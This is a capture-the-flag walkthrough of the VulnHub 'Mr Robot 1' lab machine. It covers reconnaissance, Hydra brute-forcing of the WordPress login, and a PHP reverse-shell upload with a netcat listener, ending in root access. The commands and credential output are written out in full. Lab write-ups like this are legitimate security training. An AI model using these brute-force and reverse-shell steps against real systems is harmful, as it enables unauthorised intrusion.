# Mr Robot 1
you can download the target machine from [here](https://www.vulnhub.com/entry/mr-robot-1,151/)
then after you download the `mrRobot.ova` file import it into either **virtualbox** or **vmware** for me i am using vmware
and then change the network settings for this machine and make it in the same network as your attack machine
i have set my attack kali machine to **`bridged`** and the IP Subnet is **192.168.11.0/24** so i made the network settings for the target machine also to **`bridged`**
```bash
netdiscover -i -r
```
the Mr Robot1 machine IP for me is 192.168.11.107
## Enumeration
### nmap
so we have closed ssh port and an apache web server at port 80 and 443
### web server enumeration
let view what endpoints we have at `/robots.txt` directory
### First Key
so the first key is at the directory **`key-1-of-3.txt`** that we have found at /robots.txt directory
and now go to /fsociety.dic directory and a file called fsociety.dic is downloaded
```bash
┌──(root㉿kali)-[/home/kali/vulnhub/mrrobot1]
└─# head fsocity.dic
true
false
wikia
from
the
now
Wikia
extensions
scss
window
```
this looks like a custom wordlist let's see how much words it contains
```bash
┌──(root㉿kali)-[/home/kali/vulnhub/mrrobot1]
└─# wc -l fsocity.dic
858160 fsocity.dic
```
800k is a lot so let's remove duplicates
```bash
┌──(root㉿kali)-[/home/kali/vulnhub/mrrobot1]
└─# sort fsocity.dic | uniq > fsocity2.dic
```
If after we have removed the duplicates, we are left with a word list of \~11k words. Let’s save it for later.
```bash
┌──(root㉿kali)-[/home/kali/vulnhub/mrrobot1]
└─# wc -l fsocity2.dic
11451 fsocity2.dic
```
### Web server scanning using Nikto
```bash
┌──(root㉿kali)-[/home/kali/vulnhub/mrrobot1]
└─# nikto -host 192.168.11.107
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.11.107
+ Target Hostname: 192.168.11.107
+ Target Port: 80
+ Start Time: 2023-08-18 15:50:20 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ Uncommon header 'link' found, with contents: ; rel=shortlink
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found
+ /wordpresswp-admin/wp-login.php: Wordpress login found
+ /blog/wp-login.php: Wordpress login found
+ /wp-login.php: Wordpress login found
+ /wordpresswp-login.php: Wordpress login found
+ 7915 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time: 2023-08-18 16:00:20 (GMT-4) (600 seconds)
---------------------------------------------------------------------------
```
and the scanning found a wordpress login page at **`/wp-login.php`**
### Web server directory fuzzing
we can also find the wordpress login page by fuzzing the directories using gobuster or another similar tool like ffuf, dirbuster ...etc
```bash
gobuster dir -u http://192.168.11.107 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -b 301,404
```
so if we visit **`http://192.168.11.107/login`** we will be redirected to the wordpress login page
### Bruteforcing Login Page using Hydra
if we enter invalid credentials it will say invalid username so we can enumerate valid usernames and when we find a valid one we can use it to find the valid password
intercept the request using burp (i used random credentials like admin:admin)
Now we know the parameters of the form, let’s use H**ydra** to brute force. Remember the fsociety dictionary file, this is going to come handy while using **Hydra**
```bash
hydra -L fsocity2.dic -p invalidpass 192.168.11.107 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
```
Let’s break it down:
* **-L fsocity2** : Try all the usernames from the file fsocity.dic.uniq
* **-p invalidpass** : Use an unique password, it doesn’t matter (we’re only interested in the username for now)
* **192.168.11.107** : The IP of the machine we’re attacking
* **http-post-form** : What we’re trying to brute force, here a HTTP POST form
* **‘/wp-login.php:log=^USER^\&pwd=^PASS^\&wp-submit=Log+In:F=Invalid username’**
* **/wp-login.php** : The path to where the form is located
* **log=^USER^\&pwd=^PASS^\&wp-submit=Log+In** : The POST parameters to send. ^USER^ and ^PASS^ are placeholders that will be replaced with the actual values.
* **F=Invalid username** : Consider an attempt as a failure (F) if the response contains the text *Invalid username*
as a result we will get 3 valid usernames
```bash
[80][http-post-form] host: 192.168.11.107 login: elliot password: invalidpass
[80][http-post-form] host: 192.168.11.107 login: Elliot password: invalidpass
[80][http-post-form] host: 192.168.11.107 login: ELLIOT password: invalidpass
```
if we log in with one of those usernames and a random password we will get this
next let's enumerate the password for the user elliot using hydra
```bash
hydra -l elliot -P fsocity2.dic 192.168.11.107 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'
```
as a result we will find a valid password
```bash
[80][http-post-form] host: 192.168.11.107 login: elliot password: ER28-0652
```
let's try now and login with **`elliot : ER28-0652`**
## Foothold as user daemon
As you can see that we have gained access to the admin page of the WordPress site. We are not done yet as we need to get access to the server itself. For that, we get a reverse shell by uploading a reverse shell script.
I found a reverse shell script in PHP you can find it [here](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php), and edited it with my Host machine IP address and port that would be used for any incoming reverse connections.
now go to the dashboard in the left side menu click on **Appearance -> Editor**
now we will edit a php page and put our php reverse shell in it and then when we visit this page the php code will be executed and we will get a shell back
after pasting the rev shell code in the template make sure to save it by scrolling down to the end of the template code and you will find a button called **update file**
after this we have to execute the php code by visiting the link : ****
but before doing so we have to setup a listener
```bash
┌──(root㉿kali)-[/home/kali]
└─# nc -nvlp 4444
listening on [any] 4444 ...
```
now visit the link
and you should recieve a shell
**upgrade shell**
## Lateral Movement -> from daemon to robot
let's go to the home directory and see which users are there
so there is only the user robot
if we look at his directory we will find 2 files the first is the second key which we don't have permissions to read and the second file is the password hash for the user robot
the hash type is MD5
let's upload this file to an online service called [**crackstation**](https://crackstation.net/) to crack this MD5 hash
### Second Key
## Privilege Escalation -> root
first let's do some enumeration using linpeas.sh
listing all the SUID binaries in the machine, nmap binary stands out
and the exploit is in gtfobins you can see it [here](https://gtfobins.github.io/gtfobins/nmap/#shell)
### Third Key
hope you found this walkthrough easy to understand and follow
Greeting From [**Sayonara**](https://github.com/ismail-arame)
